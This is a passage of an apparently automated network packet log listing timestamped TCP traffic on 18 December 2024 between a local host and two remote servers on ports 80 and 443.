                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.647883892 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.648005009 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.648070097 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.739866018 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.739888906 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.739923954 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.739954948 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.739973068 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.739993095 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.765018940 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.765031099 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.765091896 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.765110970 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.765152931 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.781793118 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.781864882 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.782414913 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.782535076 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.782601118 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.782749891 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.782892942 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.783101082 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.783147097 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.783850908 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.783895969 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.783919096 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.784683943 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.784792900 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.784894943 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.785696030 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.785784006 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.785829067 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.786575079 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.837913036 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.837929010 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.838629961 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.838671923 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.838788986 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.839523077 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.839561939 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.839634895 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.840533018 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.840636969 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.840657949 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.841474056 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.841556072 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.841614962 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.919814110 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.934398890 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.934461117 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.934473038 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.934524059 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.964267015 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.964335918 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.964351892 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.964413881 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.974641085 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.974661112 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.974740028 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.974873066 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.975120068 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.975498915 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.975786924 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.975930929 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.975986004 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.976706982 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.976840973 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.976885080 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.977603912 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.977762938 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.978061914 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.978502035 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.978665113 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.978717089 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.979363918 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.979645014 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.980309963 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.980364084 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.980437040 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.980482101 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.981158972 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.981275082 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.982054949 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.982115030 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.982191086 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.982232094 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.986388922 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.986474037 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.986494064 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.986985922 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.995239019 CET44349812150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.995807886 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.995903969 CET49812443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.995943069 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.995987892 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.996201992 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.996429920 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.996896029 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.996949911 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.997036934 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.997081041 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.997852087 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.997982025 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.998704910 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.998750925 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.998862028 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.998905897 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.999584913 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.999763012 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.000477076 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.000523090 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.000617981 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.000662088 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.001630068 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.001641989 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.001676083 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.002284050 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.002413034 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.002455950 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.003381014 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.003499031 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.004080057 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.004133940 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.004204035 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.004245996 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.004955053 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.005153894 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.005883932 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.005939007 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.005995989 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.006252050 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.006731033 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.006892920 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.173626900 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.173688889 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.173690081 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.173697948 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.173732042 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.174000978 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.174014091 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.174066067 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.174612045 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.187794924 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.187879086 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.187942028 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.188143969 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.188185930 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.188344955 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.188494921 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.189158916 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.189220905 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.189223051 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.189229965 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.189265966 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.189367056 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.189380884 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.189424038 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.190130949 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.190306902 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.190356970 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.191225052 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.191363096 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.191940069 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.191986084 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.192110062 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.192156076 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.192811966 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.192977905 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.193711996 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.193761110 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.193845034 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.193887949 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.194588900 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.194870949 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.194917917 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.195519924 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.195683002 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.196394920 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.196439028 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.196557999 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.196599007 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.197249889 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.197423935 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.198168993 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.198173046 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.198303938 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.199096918 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.199141979 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.199227095 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.199268103 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.199947119 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.200207949 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.200968027 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.201019049 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.201061964 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.201107025 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.201755047 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.201903105 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.202049971 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.202718019 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.202914953 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.203527927 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.203571081 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.203645945 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.203691959 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.204586983 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.205092907 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.205144882 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.205307961 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.205548048 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.206253052 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.206259012 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.206413031 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.207108021 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.207151890 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.207253933 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.207298040 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.207992077 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.208151102 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.208957911 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.208976984 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.209321022 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.209745884 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.209814072 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.209815979 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.209822893 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.209862947 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.210024118 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.210331917 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.210375071 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.210762978 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.210947990 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.211651087 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.404087067 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.404105902 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.406066895 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.409838915 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.409929991 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.409950018 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.414479971 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.417293072 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.417381048 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.417393923 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.417540073 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.429377079 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.429449081 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.429461002 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.429528952 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.506203890 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.519258976 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.519335032 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.519361019 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.519404888 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.523929119 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.524005890 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.524012089 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.524651051 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.528548956 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.528625011 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.528633118 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.528676033 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.534346104 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.534408092 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.534415007 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.534452915 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.538537979 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.538614035 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.538619995 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.538661003 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.542654037 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.542716980 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.542723894 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.542767048 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.547780037 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.547840118 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.547847033 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:25.548089027 CET49805443192.168.2.6150.171.28.10
